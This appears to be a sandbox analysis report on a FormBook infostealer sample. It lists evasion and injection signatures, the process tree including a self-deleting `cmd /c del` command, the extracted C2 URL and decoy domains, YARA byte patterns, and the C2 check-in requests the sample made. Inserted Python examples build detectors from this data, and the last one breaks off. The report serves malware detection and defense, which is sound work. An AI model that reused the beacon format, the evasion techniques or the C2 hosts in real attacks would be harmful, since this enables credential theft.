

Windows Analysis Report HkE0tD0g4NXKJfy.exe

Overview

General Information

Sample Name: HkE0tD0g4NXKJfy.exe
Analysis ID: 528615
MD5: fcc2d1cda8d3989feca9c5f5f900e164
SHA1: 075de723df172cc93c537d5472ad8025f192ddc8
SHA256: 77e1c24ecfa1d339f61b4b8011690425fa0038b3fe32761f5ce8b3126c28c5ad
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • HkE0tD0g4NXKJfy.exe (PID: 5624 cmdline: "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe" MD5: FCC2D1CDA8D3989FECA9C5F5F900E164)
    • HkE0tD0g4NXKJfy.exe (PID: 3336 cmdline: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe MD5: FCC2D1CDA8D3989FECA9C5F5F900E164)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 5960 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5904 cmdline: /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.platinumcredit.net/sh5d/"], "decoy": ["officejava.store", "appletitan.info", "securebankofamericalog.site", "weprepareamerica-world.com", "suepersoldiers.com", "aproveiteagoras2.com", "harusan.website", "zqmm.net", "joinundergrad.com", "thefullfledged.com", "jadonzia.com", "maoshuochen.com", "tuntun-newmarket.com", "danijela-djordjevic.com", "usaonlinedocs.com", "penspanter.quest", "theclubhouse.tech", "jakital.com", "nj013.com", "foodpanda.digital", "arsels.info", "junkingcarslosangelescounty.com", "formaldressesforwomen.com", "xingruinet.ltd", "xcgtsret.com", "151motors.com", "realsteelsoftwaresending.com", "cutos2.com", "justifygomqbe.xyz", "ini91.com", "uniformfacilities.com", "bullochlifetimelegacy.com", "ddivfc.com", "tuvinoencamino.com", "nbtianzhou.com", "segmauth.com", "thelittlebookof52.com", "bellezamarket.store", "terrysboutique.store", "lightinghj.com", "malayray.com", "7routines.com", "costsma.net", "tapissier-uzes.com", "reparacion-termos-madrid.com", "combingtheratsnest.com", "bobcathntshop.com", "launchpalop.com", "gopheratms.com", "mydatingshop.com", "mosucoffee.club", "ebonyslivestockservice.online", "vupeliquid.com", "buzzsaw.club", "kg-zenith.com", "quimicosypapelesdelnte.com", "secure-mivote.com", "curatorsofkool.com", "quickipcheck.com", "ruggrunnerz.com", "magoro.com", "electricatrick.com", "coralload.com", "herhimalaya.com"]}

Yara Overview

Memory Dumps

Columns: Source | Rule | Description | Author | Strings

Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C

Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(table truncated: 31 entries in the full report)

      Unpacked PEs

Columns: Source | Rule | Description | Author | Strings

Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C

Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(table truncated: 18 entries in the full report)
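The Strings column above is what a rule hit looks like at byte level: each line is an offset, the rule's string name and the raw pattern. The script below is an added example (not Joe Sandbox, yara-signator or JPCERT/CC code) that re-derives such lines from a constructed memory image, decodes the `68 xx xx xx xx` patterns as `push imm32` instructions, and flags which sequence carries the `0F 31` (RDTSC) opcode that underlies the report's "detect virtualization through RDTSC time measurements" signature. The patterns are copied from the table; the image they are scanned in, and therefore the offsets, are this example's own. The page does not say what the pushed sqlite3 constants mean, so the code only decodes them.

```python
"""Re-derive YARA string hits from a constructed memory image (added example)."""
import re
from typing import Dict, List

# Patterns copied from the report's Strings column: four of the yara-signator
# sequences and the three JPCERT/CC sqlite3 strings.
SIGNATOR_SEQUENCES = {
    # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax -> a timing delta
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}
SQLITE_PUSHES = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}
ALL_PATTERNS = {**SIGNATOR_SEQUENCES, **SQLITE_PUSHES}


def hex_to_bytes(s: str) -> bytes:
    """'03 C8 0F' -> b'\\x03\\xc8\\x0f' (bytes.fromhex ignores the spaces)."""
    return bytes.fromhex(s)


def find_all(buf: bytes, pat: bytes) -> List[int]:
    """Every offset of pat in buf; the lookahead keeps overlapping hits."""
    return [m.start() for m in re.finditer(b"(?=" + re.escape(pat) + b")", buf)]


def scan(buf: bytes, patterns: Dict[str, str] = ALL_PATTERNS) -> Dict[str, List[int]]:
    """Map string name -> offsets, the data behind lines like '0x8608:$sequence_0'."""
    hits: Dict[str, List[int]] = {}
    for name, hexs in patterns.items():
        offs = find_all(buf, hex_to_bytes(hexs))
        if offs:
            hits[name] = offs
    return hits


def push_imm32(pat: bytes) -> int:
    """Decode the immediate of a 5-byte 'push imm32' (opcode 0x68, little-endian)."""
    if len(pat) != 5 or pat[0] != 0x68:
        raise ValueError("not a push imm32")
    return int.from_bytes(pat[1:], "little")


def contains_rdtsc(pat: bytes) -> bool:
    """RDTSC encodes as 0F 31; a sequence containing it reads the TSC for a timing check."""
    return b"\x0f\x31" in pat


def build_sample_image() -> bytes:
    """Constructed 4 KiB image: NOP filler with known patterns at fixed offsets."""
    img = bytearray(b"\x90" * 0x1000)
    layout = [(0x608, "$sequence_0"), (0x9A2, "$sequence_0"),
              (0xAD9, "$sqlite3step"), (0xC4A, "$sequence_9")]
    for off, name in layout:
        data = hex_to_bytes(ALL_PATTERNS[name])
        img[off:off + len(data)] = data
    return bytes(img)


def report(buf: bytes) -> List[str]:
    """Render hits in the report's own format, e.g. '0x608:$sequence_0: 03 C8 ...'."""
    lines = []
    for name, offs in scan(buf).items():
        for off in offs:
            lines.append(f"0x{off:x}:{name}: {ALL_PATTERNS[name]}")
    return sorted(lines)


if __name__ == "__main__":
    image = build_sample_image()
    for line in report(image):
        print(line)
    for name, hexs in SQLITE_PUSHES.items():
        print(f"{name}: push 0x{push_imm32(hex_to_bytes(hexs)):08X}")
    for name, hexs in SIGNATOR_SEQUENCES.items():
        if contains_rdtsc(hex_to_bytes(hexs)):
            print(f"{name} contains RDTSC")
```

Run against a real dump (`open(path, "rb").read()`) the same `scan` reproduces the offsets the report lists for that dump; the offsets differ between the `.raw.unpack` and `.unpack` rows above for the same sequence because the two images have different layouts, which is why a rule author anchors on byte sequences rather than on addresses.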

          Sigma Overview

          System Summary:

Sigma detected: Possible Applocker Bypass
Source: Process started | Author: juju4 | Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 5960
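The Process Tree and the Sigma hit above together describe one chain: the sample relaunches its own image, explorer.exe is reported beneath that copy (the report's own signatures attribute explorer's later network activity to code injection), a SysWOW64 msdt.exe appears under explorer.exe, and that msdt.exe runs cmd.exe with `/c del` against the original sample path. The script below is an added example (not Joe Sandbox or Sigma code) that turns the tree into process-creation events and runs three detections over them: same-image self-spawn, a LOLBin started under explorer.exe (an analogue of the "Possible Applocker Bypass" hit), and a cmd `/c del` whose target is the image of one of cmd's own ancestors (the "Self deletion via cmd delete" signature). Two details the page does not show are assumed: cmd.exe's image path and the root process's parent PID; `LOLBIN_IMAGES` is a stand-in for the Sigma rule's image list, which the page only names.

```python
"""Detections over the report's process tree as process-creation events (added example)."""
import ntpath
import re
from typing import Dict, List, Tuple

SAMPLE = r"C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"

# Transcribed from the Process Tree (PIDs, images, command lines as printed).
# Assumed: cmd.exe lives in SysWOW64 like its parent; root ppid is 0.
EVENTS: List[Dict] = [
    {"pid": 5624, "ppid": 0,    "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"pid": 3336, "ppid": 5624, "image": SAMPLE, "cmdline": SAMPLE},
    {"pid": 3352, "ppid": 3336, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 5960, "ppid": 3352, "image": r"C:\Windows\SysWOW64\msdt.exe",
     "cmdline": r"C:\Windows\SysWOW64\msdt.exe"},
    {"pid": 5904, "ppid": 5960, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": f'/c del "{SAMPLE}"'},
    {"pid": 6108, "ppid": 5904, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

LOLBIN_IMAGES = {"msdt.exe"}      # assumption: a subset of the Sigma rule's list
SHELL_PARENTS = {"explorer.exe"}
# cmd /c del "quoted path" or cmd /c del unquoted-path
DEL_RE = re.compile(r'/c\s+del\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def base(path: str) -> str:
    """Case-folded file name of a Windows path, on any host OS."""
    return ntpath.basename(path).lower()


def index(events: List[Dict]) -> Dict[int, Dict]:
    return {e["pid"]: e for e in events}


def ancestors(pid: int, procs: Dict[int, Dict]) -> List[Dict]:
    """Parent, grandparent, ... until a PID outside the event set (or a cycle)."""
    chain, seen = [], {pid}
    cur = procs.get(pid)
    while cur and cur["ppid"] in procs and cur["ppid"] not in seen:
        cur = procs[cur["ppid"]]
        seen.add(cur["pid"])
        chain.append(cur)
    return chain


def detect(events: List[Dict]) -> List[Tuple]:
    procs = index(events)
    findings: List[Tuple] = []
    for e in events:
        parent = procs.get(e["ppid"])
        # (1) A process launching its own image again: the step that precedes
        #     the report's suspended-process / hollowing signatures.
        if parent and parent["image"].lower() == e["image"].lower():
            findings.append(("self_spawn", e["pid"]))
        # (2) Analogue of the Sigma hit: a LOLBin started directly under explorer.exe.
        if parent and base(e["image"]) in LOLBIN_IMAGES and base(parent["image"]) in SHELL_PARENTS:
            findings.append(("lolbin_from_explorer", e["pid"]))
        # (3) cmd /c del whose target is the image of one of cmd's own ancestors.
        if base(e["image"]) == "cmd.exe":
            m = DEL_RE.search(e["cmdline"])
            target = (m.group(1) or m.group(2)).lower() if m else None
            for anc in ancestors(e["pid"], procs):
                if target and anc["image"].lower() == target:
                    findings.append(("self_delete", e["pid"], anc["pid"]))
                    break
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

On the events above `detect` returns the self-spawn of PID 3336, the msdt.exe launch (PID 5960) under explorer.exe, and the deletion by PID 5904 of the image belonging to its ancestor PID 3336. Check (3) is the one worth keeping generic: it fires whenever a shell deletes an ancestor's executable, regardless of which LOLBin sits in between.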

          Jbx Signature Overview


          AV Detection:

Found malware configuration
Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook, the same C2 list ("www.platinumcredit.net/sh5d/") and decoy list as shown under Malware Configuration above
Multi AV Scanner detection for submitted file
Source: HkE0tD0g4NXKJfy.exe | ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match | File source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: HkE0tD0g4NXKJfy.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: HkE0tD0g4NXKJfy.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msdt.pdbGCTL | source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP | source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: HkE0tD0g4NXKJfy.exe, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
Source: Binary string: msdt.pdb | source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4x nop then pop esi

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.platinumcredit.net
Source: C:\Windows\explorer.exe | Domain query: www.thefullfledged.com
Source: C:\Windows\explorer.exe | Domain query: www.jakital.com
Source: C:\Windows\explorer.exe | Network Connect: 142.250.203.115 80
Source: C:\Windows\explorer.exe | Domain query: www.xcgtsret.com
Source: C:\Windows\explorer.exe | Domain query: www.suepersoldiers.com
Source: C:\Windows\explorer.exe | Domain query: www.arsels.info
Source: C:\Windows\explorer.exe | Domain query: www.electricatrick.com
Source: C:\Windows\explorer.exe | Network Connect: 103.224.212.219 80
Source: C:\Windows\explorer.exe | Network Connect: 52.204.216.132 80
Source: C:\Windows\explorer.exe | Domain query: www.151motors.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.platinumcredit.net/sh5d/
Source: Joe Sandbox View | ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
Source: global traffic | HTTP traffic detected: GET /sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX HTTP/1.1 | Host: www.platinumcredit.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX HTTP/1.1 | Host: www.151motors.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX HTTP/1.1 | Host: www.suepersoldiers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX HTTP/1.1 | Host: www.arsels.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQX HTTP/1.1 | Host: www.electricatrick.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQX HTTP/1.1 | Host: www.vupeliquid.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: Joe Sandbox View | IP Address: 103.224.212.219
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 25 Nov 2021 14:09:09 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "618be73d-113" | Via: 1.1 google | Connection: close | Body: as below
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 25 Nov 2021 14:09:14 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "618be75c-113" | Via: 1.1 google | Connection: close | Body: as below
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 25 Nov 2021 14:09:36 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "6192576c-113" | Via: 1.1 google | Connection: close | Body: as below
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 25 Nov 2021 14:10:15 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "6192576d-113" | Via: 1.1 google | Connection: close | Body: as below
Body of all four 403 responses (275 bytes; the Data Raw hex dump is the same content as this Data Ascii rendering): <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msdt.exe, 0000000D.00000002.550615461.0000000000453000.00000004.00000020.sdmp | String found in binary or memory: http://www.jakital.com/
Source: msdt.exe, 0000000D.00000002.550810990.0000000000475000.00000004.00000020.sdmp | String found in binary or memory: http://www.jakital.com/sh5d/?Yv=deNwNK4CD/WMHHT4cYNp3s43CKigm652n7BnZRGAFJqHojdiJSlOhFJhA2qOeK3G
Source: unknown | DNS traffic detected: queries for: www.platinumcredit.net
Source: global traffic | HTTP traffic detected: the same six GET /sh5d/?Yv=...&8pZ=MFQX requests listed above (Hosts: www.platinumcredit.net, www.151motors.com, www.suepersoldiers.com, www.arsels.info, www.electricatrick.com, www.vupeliquid.com; Connection: close; Data Raw: 00 00 00 00 00 00 00)
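The Malware Configuration section lists one C2 entry and a long decoy list, and the traffic above shows explorer.exe contacting both the configured C2 and several hosts from the decoy list with an identical request shape: path /sh5d/, query keys Yv and 8pZ, `Connection: close`, no User-Agent, a seven-NUL body. A blocklist built from the single C2 entry would therefore miss most of this traffic. The script below is an added example (not Joe Sandbox code) that parses requests in that shape, labels each host as c2, decoy or unknown from the extracted config, and flags a group of requests as a beacon when one path-and-query-key shape fans out to several hosts without a User-Agent or when the path is the configured C2 path. The six requests are transcribed from the report; the seventh, benign request and the fan-out heuristic itself are this example's own, and the decoy list is cut down to the hosts that appear in the report's traffic.

```python
"""Classify sandbox HTTP requests against an extracted FormBook config (added example)."""
import json
from collections import defaultdict
from typing import Dict, List, Set, Tuple
from urllib.parse import parse_qs, urlsplit

# Report's config, with the decoy list reduced to hosts seen in the report's traffic.
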